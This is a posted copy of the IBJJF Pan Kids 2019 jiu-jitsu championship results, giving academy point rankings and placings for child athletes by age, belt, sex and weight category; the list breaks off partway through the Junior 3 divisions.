IBJJF PAN KIDS 2019 

And Still Nutrition Athlete Coby Shields – CheckMat Silver Medalist in 

Teen 1 / Male / Grey / Light-Feather

https://www.ibjjfdb.com/ChampionshipResults/1128/PublicResults

PAN KIDS IBJJF JIU-JITSU CHAMPIONSHIP 2019

Final result Feb/17/2019 20:16:39 (UTC-08:00) Pacific Time (US & Canada)

RESULTS OF ACADEMIES

Overall

1 – Gracie Barra – 327

2 – Atos Jiu-Jitsu – 322

3 – Alliance – 258

4 – CheckMat – 218

5 – Brasa CTA – 192

6 – Gracie Humaita – 184

7 – Carlson Gracie Team – 134

8 – GF Team – 100

9 – Ares BJJ – 94

10 – Team Lloyd Irvin – 85

Mighty-Mite

1 – Atos Jiu-Jitsu – 18

2 – Alliance – 18

3 – Brasa CTA – 12

4 – Ares BJJ – 9

5 – ZR Team Association – 9

6 – CheckMat – 9

7 – Gracie Barra – 5

8 – LEAD BJJ – 4

9 – San Diego Brazilian Jiu Jitsu Academy – 3

10 – Rodrigo Freitas Brazilian Jiu-Jitsu – 2

Pee-Wee

1 – Atos Jiu-Jitsu – 47

2 – Brasa CTA – 43

3 – Alliance – 42

4 – Gracie Humaita – 34

5 – Gracie Barra – 32

6 – Carlson Gracie Team – 30

7 – Ares BJJ – 23

8 – Team DNA BJJ – 22

9 – Stronghold Jiu-Jitsu – 16

10 – Apex Martial Arts – 12

Junior

1 – Gracie Barra – 115

2 – Alliance – 108

3 – Atos Jiu-Jitsu – 69

4 – Gracie Humaita – 67

5 – Brasa CTA – 65

6 – Team Lloyd Irvin – 60

7 – CheckMat – 55

8 – Carlson Gracie Team – 49

9 – GF Team – 48

10 – Yamasaki Academy – 34

Teen

1 – Atos Jiu-Jitsu – 188

2 – Gracie Barra – 175

3 – CheckMat – 150

4 – Alliance – 90

5 – Gracie Humaita – 83

6 – Brasa CTA – 72

7 – Carlson Gracie Team – 55

8 – Ares BJJ – 45

9 – GF Team – 43

10 – Ribeiro Jiu-Jitsu – 35

ATHLETES RESULTS BY CATEGORY

Mighty-Mite 2 / Male / Grey / Light

1 – Mohammed Fareed Khouqeer – ZR Team Association

2 – Bohan Lee Lunceford – Alliance

Mighty-Mite 3 / Male / Grey / Light-Feather

1 – Jayden Kai Villamil – Alliance

2 – Maddox Taylor Obnillas – Gracie Barra

3 – Hudson Jack Perich – Clark Gracie Jiu Jitsu Academy

Mighty-Mite 3 / Male / Grey / Feather

1 – Fisher Hubbard – Atos Jiu-Jitsu

2 – Preston Thanh Hoang Phan – San Diego Brazilian Jiu Jitsu Academy

3 – Caleb Dashiell Cislo – Gracie Barra

3 – Emmanuel De La Fuente – Rodrigo Freitas Brazilian Jiu-Jitsu

Mighty-Mite 3 / Male / Grey / Light

1 – Caio Rafe Sainz – Brasa CTA

2 – Santiago Raul-Enrique Guillent – Alliance

3 – Adan Nava – Rodrigo Freitas Brazilian Jiu-Jitsu

3 – Andrew Lucas Wolzen – All American MMA

Mighty-Mite 3 / Male / Grey / Middle

1 – James Bran R. Dilley – Ares BJJ

2 – Dino Carrazana – Brasa CTA

3 – Joao Lucas Bastos – LEAD BJJ

Mighty-Mite 3 / Female / Grey / Light-Feather

1 – Penelope Garcia – Atos Jiu-Jitsu

2 – Kamaile Cian Taligatos – Alliance

3 – Isabel Iriarte – Gracie Barra

3 – Madeline Rose Perich – Clark Gracie Jiu Jitsu Academy

Mighty-Mite 3 / Female / Grey / Feather

1 – Jayden Amber Yan – Gracie Barra

2 – Caterina Amalia Cabral – Gracie Barra

Mighty-Mite 3 / Female / Grey / Light

1 – Charlotte Glass – CheckMat

2 – Keely Shaw Sparks – LEAD BJJ

Pee-Wee 1 / Male / Grey / Light-Feather

1 – Bryson Troy Terlaje – Carlson Gracie Team

2 – Rudy Valdiviezo – MC Unit Academy

3 – Greyson Flores – Gracie Barra

3 – Lucas Oliveira – Juniko’

Pee-Wee 1 / Male / Grey / Feather

1 – Icaro Blasco Moreno – Juniko’

2 – Samuel L Junco – Brasa CTA

3 – Kayden Oliveira – Gracie Barra

3 – Liam Paul Stephens – Atos Jiu-Jitsu

Pee-Wee 1 / Male / Grey / Light

1 – Charles Amedee Martel – Gracie Barra

2 – Jameson Williams – Gracie Humaita

3 – Cillian Betts – RMA Jiu-Jitsu Academy

3 – Denzo Cahill – Alliance

Pee-Wee 1 / Male / Grey / Middle

1 – Slayden Chase Hunt – Carlson Gracie Team

2 – David Lawrence Wells – Gracie Gym Texas

3 – Lucas Richardson – Gracie Barra

3 – Spencer Hennessy – Rodrigo Freitas Brazilian Jiu-Jitsu

Pee-Wee 1 / Male / Grey / Medium-Heavy

1 – Joshua Paul Lardizabal – Carlson Gracie Team

2 – Sylvester Nemrod Jones – Gracie Barra

Pee-Wee 1 / Male / Yellow / Middle

1 – Flavio Santiago Orozco Chele – Dojo Leo Iturralde

Pee-Wee 1 / Female / Grey / Light-Feather

1 – Maryjane Lindholm – Ares BJJ

2 – Bayleigh Azlynn LaJean Simmons – Alliance

3 – Madalena Flores – Atos Jiu-Jitsu

3 – Roxana Sophia Cook – Atos Jiu-Jitsu

Pee-Wee 1 / Female / Grey / Feather

1 – Leilani Bella Jacob – Gracie Humaita

2 – Maya Anne Nocon Holper – Stronghold Jiu-Jitsu

3 – Aubrey Grace Webb – Team Rivas Brazilian Jiu-Jitsu

3 – Skylar Price – Body of Four

Pee-Wee 1 / Female / Grey / Light

1 – Nicole Alessandra Mojica – Apex Martial Arts

2 – Hope Bethel – Alliance

3 – Alina Choi – Gracie Barra

3 – Audriana Bermudez – Lansang Brazilian Jiu-Jitsu

Pee-Wee 2 / Male / Grey / Light-Feather

1 – Caleb P O’Connor – Atos Jiu-Jitsu

2 – William McConnell – Team Maxwell

3 – Mark Ostroukhov – Vieira Jiu-Jitsu

3 – Trevor Alan Lambert – Carlson Gracie Team

Pee-Wee 2 / Male / Grey / Feather

1 – Antonio Toro Mendia – Atos Jiu-Jitsu

2 – Makana Joseph Godwin – Maui Jiu-Jitsu

3 – Bryce Alexander Melville – TRUJITSU / Outliers

3 – Mark Generald Banks III – Team Lloyd Irvin

Pee-Wee 2 / Male / Grey / Light

1 – Luke Noburo Matayoshi – Amazonas Rice Bros BJJ

2 – Rio Tanacs – Renato Tavares Association

3 – Aaron Edward Caicedo-Borja – Yamasaki Academy

3 – Mason Gomez – CheckMat

Pee-Wee 2 / Male / Grey / Middle

1 – Ilyas Chaudhery – Icon Jiu-Jitsu Team

2 – Trent M Edwards – TRUJITSU / Bakersfield

3 – Traxton Ray Kaufmann – Maracaba BJJ

3 – Troy Joseph Kovar – Gracie Humaita

Pee-Wee 2 / Male / Grey / Medium-Heavy

1 – Malachi Dylan Maldonado – VBros BJJ

2 – Lulu Gutierrez – Inverse

3 – Andrei Jacob Averion Alava – Carlson Gracie Team

Pee-Wee 2 / Male / Grey / Heavy

1 – Isaac Gonzales Sakamoto – Tree Brazilian Jiu-Jitsu

2 – Samuel Craig – Team Perosh Mixed Martial Arts

Pee-Wee 2 / Male / Grey / Ultra-Heavy

1 – Jayden O’neal Williams – Ares BJJ

2 – Samir Chrakie – All American MMA

Pee-Wee 2 / Male / Yellow / Feather

1 – John Anthony Brattelli – Alliance

2 – José Fernando Luna Medina – Brasa CTA

3 – Alexander Singer – SBG International (SBGI)

Pee-Wee 2 / Male / Yellow / Light

1 – Felipe Gabriel Notari Mafra Teixeira – Pioneiros Fight Club

2 – Alexis Galindo-Flores – Alliance

Pee-Wee 2 / Male / Yellow / Middle

1 – Benjamin William Freitas – Marco Nascimento BJJ

2 – Matthew Joel Quijada Uribe – Rodrigo Freitas Brazilian Jiu-Jitsu

Pee-Wee 2 / Female / Grey / Light-Feather

1 – Abigail Chan Denis – Atos Jiu-Jitsu

2 – Jaslyn Chu – Body of Four

3 – Amelia Noelle Guinn – Ares BJJ

3 – Saiteia Dias – Alliance International

Pee-Wee 2 / Female / Grey / Feather

1 – Hannah Rose Watkins – Watkins Jiu-Jitsu Academy

2 – Sky Qorichaska Ramos – Gracie Humaita

3 – Evellyn Silva Neiva – Alliance

3 – Kaiea Ghem Taligatos – Alliance

Pee-Wee 2 / Female / Grey / Light

1 – Lucia Jacklyn Ruiz – Atos Jiu-Jitsu

2 – Cadence Palugod – Stronghold Jiu-Jitsu

Pee-Wee 2 / Female / Grey / Middle

1 – Divana Luna Sandoval – GF Team

2 – Alaine Isabella Hernandez – CheckMat

3 – Lorelai Mackenzie Walsh – Ares BJJ

3 – Naya Emily Shar – Watkins Jiu-Jitsu Academy

Pee-Wee 2 / Female / Grey / Medium-Heavy

1 – Isabella Morra – Team DNA BJJ

2 – Ximena Danett Vazquez – Synergy Brazilian Jiu Jitsu

Pee-Wee 2 / Female / Grey / Heavy

1 – Haleigh Layne Bodin – Soul Fighters BJJ

2 – Keara Ann Marie Wieczorek – SBG Montana

Pee-Wee 2 / Female / Yellow / Light-Feather

1 – Sophia Faith Robinson – Fabio Prado BJJ

Pee-Wee 2 / Female / Yellow / Middle

1 – Arielle Emma Van Fossen – Alliance

Pee-Wee 3 / Male / Grey / Light-Feather

1 – Rydge DeMotta – Brasa CTA

2 – Liam Matthew Wlodarczyk – Canada Boa Brazilian Jiu-Jitsu

3 – Aiden Talavera – Cleber Jiu Jitsu

3 – Keiichi Iketani – Carpe Diem Mita

Pee-Wee 3 / Male / Grey / Feather

1 – Micheal Edward Whelan – Atos JJ International

2 – Kaeden James Maghanoy – Atos Jiu-Jitsu

3 – Evan B. A. Penabella – Stronghold Jiu-Jitsu

3 – Kaelan Kenneth Azar Isaacs – Team DNA BJJ

Pee-Wee 3 / Male / Grey / Light

1 – Vitalii Pushnin – Guerrilla Jiu Jitsu

2 – Nicholas Yasuto Nakanishi – Gracie Barra

3 – Michael Wayne Cortina – Gracie Barra

3 – Richard Lee Ibison – Gracie Barra JJ

Pee-Wee 3 / Male / Grey / Middle

1 – Lawson Williams – Team DNA BJJ

2 – Damien Carpenter – Gracie Humaita

3 – Jack Mitchell – Atos Jiu-Jitsu

3 – Landon Stoble – Brazilian Jiu-Jitsu United

Pee-Wee 3 / Male / Grey / Medium-Heavy

1 – Jonas Silva Nelissen – Nova Uniao Canada

2 – Adrian Alfredo Archaga – Gracie Humaita

3 – Connor Joshua Macnab Freeman – Alliance

3 – Evandle Ellis – Alliance

Pee-Wee 3 / Male / Yellow / Light-Feather

1 – Dylan Blake Ortiz – Carpe Diem Mita

2 – Wil Christian Seda – Brazilian Top Team

Pee-Wee 3 / Male / Yellow / Feather

1 – Reece Anthony Dixon – Alliance

2 – Sebastian King Acero – Gracie Humaita

3 – Carlos Rafael Sainz III – Brasa CTA

3 – Evan Middleton – Rodrigo Pinheiro BJJ

Pee-Wee 3 / Male / Yellow / Light

1 – Jaiden Mitchell Bowles – Gracie Humaita

2 – Sasha Edkim Nixon – Gracie Barra

3 – Cole Joseph Mogush – Gracie Barra

3 – Matthew Brown – Brazilian Jiu-Jitsu United

Pee-Wee 3 / Male / Yellow / Middle

1 – Sidney Matthew Katz – Vagner Rocha Martial Arts

2 – David Correa – Gracie Barra

3 – Miles Joel White – Alliance

Pee-Wee 3 / Male / Yellow / Super-Heavy

1 – Maxwell Alston – Brazilian Jiu-Jitsu United

2 – Logan Ty Duldulao – Rodrigo Freitas Brazilian Jiu-Jitsu

Pee-Wee 3 / Female / Grey / Light-Feather

1 – Malia Kollmeyer – Stronghold Jiu-Jitsu

2 – Mara-Alexandria Cortes Sarinas – Ares BJJ

3 – Riley Morales – Gracie Barra

3 – Savannah Anders – Gracie Barra

Pee-Wee 3 / Female / Grey / Feather

1 – Zoe Yazmin Delgado – Brasa CTA

2 – Alexis Cuevas – Atos Jiu-Jitsu

3 – Abigail Joy Lumaban – Atos Jiu-Jitsu

3 – Malaya Mae Amend – Gracie Barra

Pee-Wee 3 / Female / Grey / Light

1 – Madison Michael Van Dyke – Charles Gracie Jiu-Jitsu Academy

2 – Nycolle Mandy Ramalho Calheiros – Cicero Costha Canada

3 – Kadience Rae Milligan – UFC Gym

3 – Kyla Marie Hill – Gracie Barra

Pee-Wee 3 / Female / Grey / Middle

1 – Braelyn Kay Lunceford – Alliance

2 – Kennedy Rie Anne O’Donnell – Team DNA BJJ

3 – Nina Franklin – Gracie Barra

3 – Zoe Jane Castano – Marra Senki Brazilian Jiu Jitsu Academy LLC

Pee-Wee 3 / Female / Grey / Medium-Heavy

1 – Piper Wren Brawley – Brasa CTA

2 – Leslie K Foxworthy – Vieira Jiu-Jitsu

3 – Lola Leticia Terraza – Carlson Gracie Team

Pee-Wee 3 / Female / Yellow / Feather

1 – Anabella L Junco – Brasa CTA

2 – Megan Au – Apex Martial Arts

3 – Charlotte Moser Brents – SBG Montana

Junior 1 / Male / Grey / Rooster

1 – Theos McEvatt – Gracie Barra

2 – Seraf Brown – Amazonas Rice Bros BJJ

3 – Elias Jayden Gonzales – Ares BJJ

3 – Keagan Ansley Mesina – Vagner Rocha Martial Arts

Junior 1 / Male / Grey / Light-Feather

1 – Murilo do Vale – Brasa CTA

2 – Keku Sakaguchi – Brasa CTA

3 – Braulio Corral III – BJJ Coach – Corral’s Martial Arts

3 – Parker Lewis – Team Lloyd Irvin

Junior 1 / Male / Grey / Feather

1 – Mariano Cristiano Moreno – Yamasaki Academy

2 – James Tiberius Clark – Yamasaki Academy

3 – Angel Patino – All American MMA

3 – Patrick Nathan Mccance – TRUJITSU / Bakersfield

Junior 1 / Male / Grey / Light

1 – Malachi D. R. Daniel – Team Lloyd Irvin

2 – Aiden Nicanor Abelardo – Gracie Barra

3 – Gabriel Salsamendi – GF Team

3 – Ryan Newell – RMA Jiu-Jitsu Academy

Junior 1 / Male / Grey / Middle

1 – David Rosales – Alliance

2 – Ocean DeMotta – Brasa CTA

3 – Christopher Ruben Caicedo-Borja – Yamasaki Academy

3 – Mathias Espiritu – CheckMat

Junior 1 / Male / Grey / Medium-Heavy

1 – Cash Hendricks Page – Carlson Gracie Team

2 – Eric Silva Nelissen – Nova Uniao Canada

3 – Henry Antonio Ibañez – Soul Fighters BJJ

3 – Hunter Alan Artim – One Jiu-Jitsu USA

Junior 1 / Male / Grey / Super-Heavy

1 – Peter Fonseca – CheckMat

2 – Haziel Colin – ATC BJJ

Junior 1 / Male / Grey / Ultra-Heavy

1 – Luke Jaxson Schoch – Brasa CTA

2 – Benjamin Reid McTaggart – Alliance

Junior 1 / Male / Yellow / Rooster

1 – Jack Saxton – Vieira Jiu-Jitsu

2 – Kaua Gabriel Oliveira Goncalves – GF Team

3 – Chase Colbath – GF Team

3 – Jaime Eduardo Lopez Ordonez – Team Predador Jiu-Jitsu

Junior 1 / Male / Yellow / Light-Feather

1 – Matthew Velez – Team Robson Moura

2 – Ouka Aoki – Carpe Diem

3 – George F Steenblik – Carlson Gracie Team

3 – Jace Lane Trammell – SFS MMA

Junior 1 / Male / Yellow / Feather

1 – Toby James Gamble – Luiz Palhares Jiu Jitsu

2 – João Pedro Sant’Anna de Souza Figueiredo – GF Team

3 – Aiden Misha White – Alliance

3 – Hunter Hamilton – Brazilian Top Team

Junior 1 / Male / Yellow / Light

1 – Calahan Vu Nguyen – RMA Jiu-Jitsu Academy

2 – Sam Troy Shar – Watkins Jiu-Jitsu Academy

3 – Kalijah Kage Wieczorek – SBG Montana

Junior 1 / Male / Yellow / Middle

1 – Kolby Michael Gonzales – Gracie Barra

2 – Jett Holden Maughan – Gracie Barra

3 – Taber Luck Jordan – Vieira Jiu-Jitsu

Junior 1 / Male / Yellow / Medium-Heavy

1 – Zain Chaudhry – Gracie Humaita

2 – Dylan Balestino – Atos Jiu-Jitsu

3 – Josiah Buie – Brazilian Top Team

3 – Sebastian Gonzalez – Miami WMB

Junior 1 / Male / Yellow / Super-Heavy

1 – Jonnathan Quijada – Rodrigo Freitas Brazilian Jiu-Jitsu

2 – Nolan Tristan Chua Torres – Gracie Humaita

Junior 1 / Male / Yellow / Ultra-Heavy

1 – Jagger Kael Springfield – Luiz Palhares Jiu Jitsu

2 – Satoshi Bryce Davis – Caveirinha Jiu-Jitsu Family USA

3 – Camden Allen Mandry – GF Team

3 – Coleton Michael La Fontaine – Claudio Franca

Junior 1 / Male / Orange / Light-Feather

1 – Marlon da Silva de Amorim – Escola de JJ Leão Teixeira

Junior 1 / Female / Grey / Rooster

1 – Kayliegh Jaelynn Fernandez – Cleber Jiu Jitsu Visalia

2 – Hailey Zabala Lansang – Lansang Brazilian Jiu-Jitsu

3 – Allyza-Grace Ramos – Gracie Barra

3 – Melina Key – GD Jiu-Jitsu Association

Junior 1 / Female / Grey / Light-Feather

1 – Kaloni Brown – Brasa CTA

2 – Akailia San Juan Laanan – Claudio Franca

Junior 1 / Female / Grey / Feather

1 – Cydney Olivia Castillo – BJJ Globetrotters USA

2 – Nevaeh Lansang – Lansang Brazilian Jiu-Jitsu

3 – Keeva Marie Cole – Atos Jiu-Jitsu

3 – Samara Valladolid – ATC BJJ

Junior 1 / Female / Grey / Light

1 – London D Navarro – Atos Jiu-Jitsu

2 – Epenesa Elison – Babalu’s Iron Gym

3 – Ella James Dietrich – Gracie Barra

3 – Mya May Mccauley – Brasa CTA

Junior 1 / Female / Grey / Middle

1 – Bianca Guedes Nassif – Gracie Barra

2 – Kinleigh Brooke Meeks – Luiz Palhares Jiu Jitsu

3 – Mazzie Hetzel – Gracie Gym Texas

Junior 1 / Female / Grey / Medium-Heavy

1 – Raquel Whiting – Team Lloyd Irvin

2 – Karissa Faith Mendoza – Cleber Jiu Jitsu Visalia

Junior 1 / Female / Grey / Super-Heavy

1 – Laila Oliveira Souza – Juniko’

Junior 1 / Female / Yellow / Light-Feather

1 – Coco Blackwell – Alliance

2 – Nya Ruotolo – Atos Jiu-Jitsu

3 – Taya Angelina Brattelli – Alliance

Junior 1 / Female / Yellow / Feather

1 – Sierra Ann Fahn – TRUJITSU / Outliers

2 – Ayla Isaacs – Carlson Gracie Team

3 – Madison Hoskins – Fabio Santos BJJ

3 – Nalani M Checa – Carlson Gracie Team

Junior 1 / Female / Yellow / Light

1 – Nina Jacob – Gracie Humaita

2 – Jordan E Gerster – Soul Fighters BJJ

3 – Emma Jane Zinser – Del Mar Jiu-Jitsu Club

Junior 2 / Male / Grey / Rooster

1 – Bradley Tim Mcdonough – Mario Sukata International

2 – Liam Hallett – Juniko’

3 – Joe Shirota – Caveirinha Jiu-Jitsu Family USA

3 – Ryker Ryan Lipscomb – Maracaba BJJ

Junior 2 / Male / Grey / Light-Feather

1 – Jayden Tyler Lopez – Unity Jiu-jitsu

2 – Kingston Richards – Atos Jiu-Jitsu

3 – Anthony Bagiryan – Alliance

3 – Tyoh Muto Tran – Atos Jiu-Jitsu

Junior 2 / Male / Grey / Feather

1 – Juan Herrera – Miami WMB

2 – Marcus Basco – TRUJITSU / Outliers

3 – Brodey Tyler Stauffer – Brasa CTA

3 – Kauã Barros Cunha – Game Fight Oswaldo Cruz

Junior 2 / Male / Grey / Light

1 – Kaila Sano – Axis Jiu-Jitsu

2 – Jayen Barros – Gracie Barra

3 – Anthony Josiah Avila – Atos Jiu-Jitsu

3 – Joshua Theodore DeRamus – Team Rivas Brazilian Jiu-Jitsu

Junior 2 / Male / Grey / Middle

1 – Lucques David Sorenson – One Jiu-Jitsu USA

2 – Richard Ilias Garcia – Kings MMA Anaheim

3 – Andres Antonio Viera – Brasa CTA

3 – Jacob Fayzulayev – Brasa CTA

Junior 2 / Male / Grey / Medium-Heavy

1 – Luke Evan Reid – BJJ Coach – Corral’s Martial Arts

2 – Alexander Joseph Burns – Ares BJJ

3 – David Andrei Robu – Serao Mixed Martial Arts

3 – Max Frederick King – ZR Team Association

Junior 2 / Male / Grey / Heavy

1 – Miles Johnathan Garlichs – CheckMat

Junior 2 / Male / Grey / Super-Heavy

1 – Lorenzo Lopez – Miami WMB

2 – Tristin Webb – Team Rivas Brazilian Jiu-Jitsu

3 – Austin Walyn Ramsey – Maracaba BJJ

3 – Maximus Cojzoo Lo – Soul Fighters BJJ

Junior 2 / Male / Grey / Ultra-Heavy

1 – Jack Tamarit – Marcio Cruz Brazilian Jiu-Jitsu

2 – Peter Tangaro III – Atos Jiu-Jitsu

3 – Lucas McCullough – SBG International (SBGI)

Junior 2 / Male / Yellow / Rooster

1 – Aaharen Agan Piranavan – Mamute Martial Arts Academy

2 – Kainalu Tetsuo Meha Kaku – Brasa CTA

3 – Matheus de Sousa Faria – GF Team

Junior 2 / Male / Yellow / Light-Feather

1 – Mick Moylan – Gracie Barra

2 – Brody James Liening – Carlson Gracie Team

3 – Kian Alexander Garib – Vagner Rocha Martial Arts

3 – Rio Amaru DeSouza – Carlson Gracie Team

Junior 2 / Male / Yellow / Feather

1 – Jorge L. F. Fernandes – American Top Team Fort Lauderdale

2 – Liam Matthew Qureshi – Gracie Barra

3 – Cameron Lee Olenick – RMA Jiu-Jitsu Academy

3 – Mauricio Rody Soares – Projeto Drive-In

Junior 2 / Male / Yellow / Light

1 – Bryan Moreira Pessanha – GF Team

2 – Santino John Acero – Gracie Humaita

3 – Levi Foote – The Hive Martial Arts Academy

3 – Thomas Anthony Rubio – Luiz Palhares Jiu Jitsu

Junior 2 / Male / Yellow / Middle

1 – Eduardo Cancela Cruz – Gracie Humaita

2 – Brandon William McBride – Alliance

3 – Diego Moreno – Gracie Barra

3 – Kasey James Wycotte – Canada Boa Brazilian Jiu-Jitsu

Junior 2 / Male / Yellow / Medium-Heavy

1 – Roberto Santos – Ralph Gracie Chino Hills

2 – Ethan Tran – Vagner Rocha Martial Arts

3 – Aedan Joseph Prata – Cascao Jiu-Jitsu

3 – Owen Davis-Pietz – CheckMat

Junior 2 / Male / Yellow / Heavy

1 – Arthur da Silva Pimenta – GF Team

2 – Didier Novoa – Miami WMB

3 – Vicenzo Riken Pascual Ramos – Gracie Humaita

Junior 2 / Male / Orange / Feather

1 – Yanko Lopez jr – American Top Team Fort Lauderdale

2 – Ryan Lee Boardman – Gracie Humaita

3 – Noah Jacob Lumaban – Atos Jiu-Jitsu

Junior 2 / Male / Orange / Light

1 – Cedrich Andal – Body of Four

Junior 2 / Male / Orange / Middle

1 – Ames-Michael Elijah Hoevker – Gracie Humaita

2 – José Antonio Rovayo – Team Predador Jiu-Jitsu

Junior 2 / Female / Grey / Rooster

1 – Harmony Ganiya Dixon – Team Lloyd Irvin

2 – Natalee Funegra – Atos Jiu-Jitsu

3 – Mario Rendon – Gracie Barra

3 – Rosalina Squillante – Miami WMB

Junior 2 / Female / Grey / Light-Feather

1 – Tylie Ualani Ann Peralta – Brasa CTA

2 – Kaiya Naomi-Fay Maggini-Foster – Ares BJJ

3 – Ava C. Canlas – Soul Fighters BJJ

3 – Isabella DeLa Cruz Butler – Gracie Barra

Junior 2 / Female / Grey / Feather

1 – Elsa Clark – Yamasaki Academy

2 – Amber Farr – Lansang Brazilian Jiu-Jitsu

3 – Emily Rachel Katsuye Marlowe – Gracie Fighter

3 – Siclari del Carmen Jaime – Marra Senki Brazilian Jiu Jitsu Academy LLC

Junior 2 / Female / Grey / Light

1 – Katherine Miracle Lo – Soul Fighters BJJ

2 – Kaiya Mannapso – Apex Martial Arts

3 – Desirée Deila Pacheco – Gracie Humaita

3 – Elisa Renee Cantu – GF Team

Junior 2 / Female / Grey / Middle

1 – Emily Grace Hill – Gracie Barra

2 – Jiana Alexis Martinez Rivera – Carlson Gracie Team

3 – Jarelly Gabriela Navarrete – Soul Fighters BJJ

Junior 2 / Female / Grey / Medium-Heavy

1 – Ivana Lyn Odle – Brasa CTA

2 – Grace Jenean Stratton – Zenith BJJ – Las Vegas

3 – Azizah Rahman – Carlson Gracie Team

3 – Eva L. Wittkop – Alliance

Junior 2 / Female / Grey / Heavy

1 – Kaylee Cahill – Alliance

2 – Anya Alston – Brazilian Jiu-Jitsu United

3 – Ava Kristin Rae Sullivan – Team Maxwell

Junior 2 / Female / Yellow / Rooster

1 – Sophia Celine Behar – Evolve MMA

2 – Charlee June Witsch – Synergy Brazilian Jiu Jitsu

3 – Carly Renee Rodriguez – Presa Brazilian Jiu-Jitsu

3 – Olivia E Hernandez – Brazilian Top Team

Junior 2 / Female / Yellow / Light-Feather

1 – Ariana Nicole Brattelli – Alliance

2 – Keilana Veronica Taligatos – Alliance

3 – Eva Richter – Team Rivas Brazilian Jiu-Jitsu

3 – Jacqueline Bowles -Brooks – MC Unit Academy

Junior 2 / Female / Yellow / Feather

1 – Dania Silva – Soul Fighters BJJ

2 – Brenda Gonçalves – Alliance

3 – Leanna Au – Apex Martial Arts

3 – Marley Mae Wulfestieg – Gracie Barra

Junior 2 / Female / Yellow / Light

1 – Eduarda Keiko Chiba De Bessa – Motta Jiu-Jitsu

2 – Kaeden Jai Foxx – De La Riva Jiu-Jitsu USA

3 – Hadiya Galvante – Atos Jiu-Jitsu

3 – Olivia Sakura Ciampa – Cascao Jiu-Jitsu

Junior 2 / Female / Yellow / Middle

1 – Ashlin Neylan – BARBOSA JIU-JITSU USA

2 – Vanessa Ilyse Pirrello – CheckMat

Junior 3 / Male / Grey / Rooster

1 – Zane Mangan – GF Team

2 – Ethan Davis Warchol – Gracie Barra

3 – Jesiah Conol – Atos Jiu-Jitsu

3 – Kenneth Jay Vargas – TRUJITSU / Outliers

Junior 3 / Male / Grey / Light-Feather

1 – Dayle Cailles – Jean Jacques Machado BJJ

2 – Ko’o Kumabe – Atos Jiu-Jitsu

3 – Eli Francis Chmielewski – Gracie Barra

3 – Levin William Kapuaahilani Peralta – Brasa CTA

Junior 3 / Male / Grey / Feather

1 – Christian Esteban Jimenez – Carlson Gracie Team

2 – Cesar Avendano-Bonilla – Miami WMB

3 – Alexander Soltes – Alliance

3 – Brandon Tyler Vega – Brasa CTA

Junior 3 / Male / Grey / Light

1 – Antonio Figueiredo Genovesi – Alliance

2 – Rhonin James Swenson – Team Lloyd Irvin

3 – Joel Thomas Hetzel – Gracie Gym Texas

3 – Yuri Justin Romo – Gracie Barra

Junior 3 / Male / Grey / Middle

1 – Keagan Lee – Honor Roll BJJ

2 – Jacob Diego Gabaldon – Gracie Barra

3 – Fintan Marano – Team Lloyd Irvin

3 – Miguel Marques dos Santos – Akxe BJJ

Junior 3 / Male / Grey / Medium-Heavy

1 – Omar Diriee – Juniko’

2 – Dean Jett Anglin – Cascao Jiu-Jitsu

3 – Adrian Daniel Cuevas – Brasa CTA

3 – Christopher Cole Trammell – SFS MMA

Junior 3 / Male / Grey / Heavy

1 – Nolan Arjen Edward O’Donnell – Team DNA BJJ

2 – Ethan Jhay Soriano Mondigo – Over Limit BJJ International

3 – Elryk Nieto – Marra Senki Brazilian Jiu Jitsu Academy LLC

Junior 3 / Male / Grey / Super-Heavy

1 – Nicholas Michael Alegrete – Gracie Barra

2 – Ryan James Gomizelj – Zenith BJJ – Canada

3 – Dominick Alessio – Gracie Barra

Junior 3 / Male / Grey / Ultra-Heavy

1 – Tyernen Tango Terraza – Carlson Gracie Team

2 – Kaylen Shiva Hakeem Vassoodaven – New School BJJ

3 – Jake Ramos – Soul Fighters BJJ

3 – Noah Enzo Pulido – Lansang Brazilian Jiu-Jitsu

Junior 3 / Male / Yellow / Rooster

1 – Hunter Mekoa Berger – Caveirinha Jiu-Jitsu Family USA

2 – Jase Benjamin Macatangay – Gracie Barra

3 – Christopher John Hill – Gracie Barra JJ

3 – Joseph Colton Vela V – Gracie Barra JJ

Junior 3 / Male / Yellow / Light-Feather

1 – Renan Do Carmo Ottoni – Alliance

2 – Edward Ryan Libunao – CheckMat

3 – Riley Arjan Jhuty – Apex Martial Arts

3 – Tyler Isaiah Metcalf – Brasa CTA

Junior 3 / Male / Yellow / Feather

1 – Mario Gaetano Carini – Atos Jiu-Jitsu

2 – Brendo de Lima Rozendo – Beija-Flor

3 – Joshua Xavier Patino – All American MMA

3 – Logan James Hicks – Ares BJJ

Junior 3 / Male / Yellow / Light

1 – Ryu Ibe – Carpe Diem Mita

2 – Elton Jordan Lobaton. Jr. – Bonsai Jiu-Jitsu – Guam

3 – Billy Joe Heintz – Team LDMA

3 – Nathaniel Aries Saldana – Gracie Barra JJ

Junior 3 / Male / Yellow / Middle

1 – Yuri Monteiro Silva – Alliance

2 – Myles Joaquin Javelosa – Teixeira Garcia Brazilian Jiu Jitsu

3 – Cade William Handy – Alliance

3 – Syruss Domingo Flores – CheckMat

Junior 3 / Male / Yellow / Medium-Heavy

1 – Joao Lucas Caiado Guerra – Yamasaki Academy

2 – Ethan David Wong – Mamute Martial Arts Academy

3 – Braedon Joseph Shaw – Alliance

3 – Julio Cesar Suzigan Martins – BARBOSA JIU-JITSU

Junior 3 / Male / Yellow / Heavy

1 – Malachi Castano – Marra Senki Brazilian Jiu Jitsu Academy LLC

2 – Isaiah Martinez – Teixeira Garcia Brazilian Jiu Jitsu

Junior 3 / Male / Yellow / Super-Heavy

1 – Ryan Anthony Atilano – Honor Roll BJJ

Junior 3 / Male / Orange / Rooster

1 – Willem Anhuth – GF Team

2 – Esteban Forrez – ASC 59

3 – Fabrizio Salis – Fight Nuoro Academy A.S.D.

3 – Nicholas Vargas – Codella Brazilian Jiu Jitsu

Junior 3 / Male / Orange / Light-Feather

1 – Isa Anwer Abdul Rahman – CheckMat

2 – Kaike de Oliveira de Lima – Nova União

3 – Juelz Sincere Devera – CheckMat

Junior 3 / Male / Orange / Feather

1 – Jackson C. Glass – CheckMat

2 – Kanoa Brown – Amazonas Rice Bros BJJ

3 – Maximus MacDougall – Gracie Humaita

Junior 3 / Male / Orange / Light

1 – Tyler Silva Neiva – Alliance

2 – Benyamin Yehoshua Fuller – Cobra Kai Jiu Jitsu

3 – Joaquin Carrasco – LEAD BJJ

3 – Justin Swaminadhan – Team OJJ Canada

Junior 3 / Male / Orange / Middle

1 – Delton Alexander Kaufmann – Maracaba BJJ

